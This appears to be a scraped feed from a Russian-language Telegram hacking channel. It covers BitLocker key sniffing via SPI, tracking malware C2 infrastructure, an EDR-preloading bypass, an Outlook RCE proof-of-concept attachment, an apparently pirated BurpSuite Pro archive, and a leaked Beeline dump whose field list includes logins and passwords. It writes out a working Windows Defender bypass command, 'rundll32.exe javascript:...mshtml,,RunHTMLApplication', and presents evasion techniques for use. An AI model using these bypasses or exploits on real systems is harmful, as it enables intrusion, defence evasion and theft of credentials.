This media is not supported in your browser
VIEW IN TELEGRAM
Lenovo X1 Carbon Bitlocker Key Sniffing
круто, 42.9 секунды
круто, 42.9 секунды
🔥83😱16👌4👍2
Proxy Bar
Lenovo X1 Carbon Bitlocker Key Sniffing круто, 42.9 секунды
внесем немного конкретики о пинах
BitLocker Key retrieval on a Windows 11, Lenovo X1 Carbon Gen 11 via SPI Sniffing.
То есть на задней стороне материнки, есть тестовые пады, секурненько )))
*
Да, это TPM 2.0
*
Ну и почитать TPM SNIFFING
#bitlocker #sniff
BitLocker Key retrieval on a Windows 11, Lenovo X1 Carbon Gen 11 via SPI Sniffing.
То есть на задней стороне материнки, есть тестовые пады, секурненько )))
*
Да, это TPM 2.0
*
Ну и почитать TPM SNIFFING
#bitlocker #sniff
👍16🔥9👌1
В поисках malware инфраструктуры
*
Если вам интересно как ищут всякие
*
Исходя из статьи, можно немного прикрыть свой
*
Tracking Malware Infrastructure
#malware #c2
*
Если вам интересно как ищут всякие
opedir, или C&C со всякими cobalt-strike, havoc или малварь вроде dark comet, то есть интересная статья, в статье 11 примеров на базе censys.*
Исходя из статьи, можно немного прикрыть свой
C2 от любопытных глаз*
Tracking Malware Infrastructure
#malware #c2
🔥16👍2
This media is not supported in your browser
VIEW IN TELEGRAM
Xbox ? PlayStation ?
No
Ubiquiti switch !
No
Ubiquiti switch !
🔥71👍7😱5👌2
Windows Defender Detection Mitigation Bypass Vulnerability
Win LPE
В 2022 году hyp3rlinx рассказывал как можно обойти
*
то есть было и пофиксили:
магия запятой:
собака старая, трюки новые.
CVE пока не имеет )
#defender #bypass
Win LPE
В 2022 году hyp3rlinx рассказывал как можно обойти
windows defender передав дополнительный путь при ссылке на mshtml, дырку пофиксили. НО, добавив пару запятых в старый трюк - и опять bypass. *
то есть было и пофиксили:
C:\sec>rundll32.exe javanoscript:"\..\..\mshtml,RunHTMLApplication ";alert(666)магия запятой:
C:\sec>rundll32.exe javanoscript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)собака старая, трюки новые.
CVE пока не имеет )
#defender #bypass
🔥61👍1😱1👌1
Свежая техника обхода
Кому лень читать всю статью то: техника основана на запуске малвари ДО загрузки библиотеки
Суть вот в чем,
Суммируем: нужно найти момент для загрузки малвари ЧУТЬ раньше, при инициализации процесса - тогда
*
Статья - Bypassing EDRs With EDR-Preloading
Сорцы - EDR-Preloader
#EDR #malware
EDRКому лень читать всю статью то: техника основана на запуске малвари ДО загрузки библиотеки
DLL EDR.Суть вот в чем,
EDR должен внедрить свою DLL в каждый процесс, но если внедрять слишком рано - процесс крэшится, внедрять слишком поздно - так его уже малварь подчинила.Суммируем: нужно найти момент для загрузки малвари ЧУТЬ раньше, при инициализации процесса - тогда
EDR в лохматой жопе.*
Статья - Bypassing EDRs With EDR-Preloading
Сорцы - EDR-Preloader
#EDR #malware
🔥21
Грязный
однострочник для быстрого обнаружения
*
BASHоднострочник для быстрого обнаружения
XSS в файлах PHP*
rg --no-heading "echo.*\\\$_GET" | grep "\.php:" | grep -v -e "(\$_GET" -e "( \$_GET" -e "esc_" -e "admin_url" -e "(int)" -e htmlentities🔥35👍8👌1
Прощай NGINX
*
теперь и
Глав разраб форкнул проект и теперь будет
Почитайте письмо, как эффективные манагеры в очередной раз все обосрали
https://freenginx.org/pipermail/nginx/2024-February/000000.html
*
В AUR уже что то появилось
#fuck
*
ESXI умер пару дней назадтеперь и
NGINX умерГлав разраб форкнул проект и теперь будет
FreeNginxПочитайте письмо, как эффективные манагеры в очередной раз все обосрали
https://freenginx.org/pipermail/nginx/2024-February/000000.html
*
В AUR уже что то появилось
#fuck
😱32🔥11👍2👌2
cve-2024-21413_outlook_rce.sh
1.1 KB
CVE-2024-21413
Expect Script POC
*
Microsoft Outlook Remote Code Execution Vulnerability (through the preview panel) CVSS:3.1 9.8 / 8.5
*
Link
Expect Script POC
*
Microsoft Outlook Remote Code Execution Vulnerability (through the preview panel) CVSS:3.1 9.8 / 8.5
*
Link
🔥16👍3
burpsuite_pro_v2024.zip
692.2 MB
BurpSuite PRO version 2024.1.1.1
+BurpBountyPro_v2.8.0
ru+eng
+manual
+BurpBountyPro_v2.8.0
ru+eng
+manual
🔥29😱5👌3👍2
Proxy Bar
Beeline потёк
В дампе поля:
APT41 - коменты будут ?
*
GUID
ABONENT_ID
ABONENT_NAME
LOGIN
PASSWORD
ACCOUNT_USR_BLOCK
ABONENT_BLOCK
DEVICE_BLOCK
QUESTION ANSWER
ACTIVE_DATE
DEACTIVE_DATE
PACKET_TYPE
TOWN
DEVICE
SUBSCRIBER_ID
ADDRESS_ID
*
APT41 - коменты будут ?
*
GUID
ABONENT_ID
ABONENT_NAME
LOGIN
PASSWORD
ACCOUNT_USR_BLOCK
ABONENT_BLOCK
DEVICE_BLOCK
QUESTION ANSWER
ACTIVE_DATE
DEACTIVE_DATE
PACKET_TYPE
TOWN
DEVICE
SUBSCRIBER_ID
ADDRESS_ID
*
👍21🔥1
Proxy Bar
Beeline потёк
Все эти билайны и теле2 это только верхушка айсберга и перерастает в шпионский треш, да еще и очень быстро.
Даже если просто переводить .md можно примерно прикинуть объемы затрагиваемых тем, структур, организаций и стран с их альянсами.
Ноги выросли отсюда I-S00N
В общем китайский APT-подрядчик нормально так накинул на вентилятор, от
В общем будет интересно, читаем вникаем дальше
*
Ну и да, кого в Китае расстреляют
UPDATE: хороший разбор тут с переводами скринов на английский (читать снизу вверх за последние 19 часов)
#APT
Даже если просто переводить .md можно примерно прикинуть объемы затрагиваемых тем, структур, организаций и стран с их альянсами.
Ноги выросли отсюда I-S00N
В общем китайский APT-подрядчик нормально так накинул на вентилятор, от
iOS Spyware до физических имплантируемых устройств.В общем будет интересно, читаем вникаем дальше
*
Ну и да, кого в Китае расстреляют
UPDATE: хороший разбор тут с переводами скринов на английский (читать снизу вверх за последние 19 часов)
#APT
👍26